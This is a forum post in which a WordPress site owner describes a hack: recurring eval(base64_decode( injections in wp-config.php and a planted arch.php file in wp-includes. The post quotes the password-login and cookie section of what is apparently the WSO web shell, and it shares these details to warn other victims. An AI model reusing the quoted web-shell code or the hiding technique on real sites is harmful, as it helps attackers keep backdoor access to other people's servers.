WordPress hacked with a strange file hidden in the includes folder
-
I recently found out that my site was hacked and went through various steps but it still kept adding eval(base64_decode( junk in my wp-config.php file. It also included ___DATADIRipconfig.bin and folders that kept being uploaded on a daily basis.
Today I found this scary looking file after spending hours trying to clean my site from being hacked. The filename is arch.php and I’ve searched everywhere but couldn’t find what the purpose of the file was, so I of course deleted it but wanted to share this bit of info to anyone else who might be going through the same thing I went through.
The file is located in: wp-includes/Text/Diff/Engine. It’s a rather large file and uses the zipfile_mod class to create files/directories with base64 characters. Below is a snippet of the code:
function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); }
If it continues or if I find anything else, I’ll add more info.
- The topic ‘WordPress hacked with a strange file hidden in the includes folder’ is closed to new replies.